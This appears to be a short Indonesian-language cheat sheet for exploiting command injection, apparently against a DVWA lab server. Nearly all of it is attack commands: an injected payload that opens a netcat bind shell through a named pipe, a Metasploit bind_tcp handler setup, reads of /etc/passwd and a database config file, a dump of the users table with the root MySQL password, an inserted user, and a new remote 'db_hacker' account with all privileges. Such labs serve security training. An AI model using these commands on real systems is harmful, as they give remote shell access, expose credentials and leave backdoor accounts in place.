Command Injection
pake biasa :
server :
$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
client :
nc $ip_server 4444
pake metasploit :
server :
$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
client :
msfconsole
kasih IP server
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.43.207
exploit
bbrp instruksi bagus :
whoami
grep apache /etc/passwd
grep apache /etc/group
ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/dvwa
ls -l /var/www/html/dvwa
ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot
-pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT
OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
mysql -u db_hacker -h 192.168.43.207 -p
show databases;
quit
date
echo "Your Name"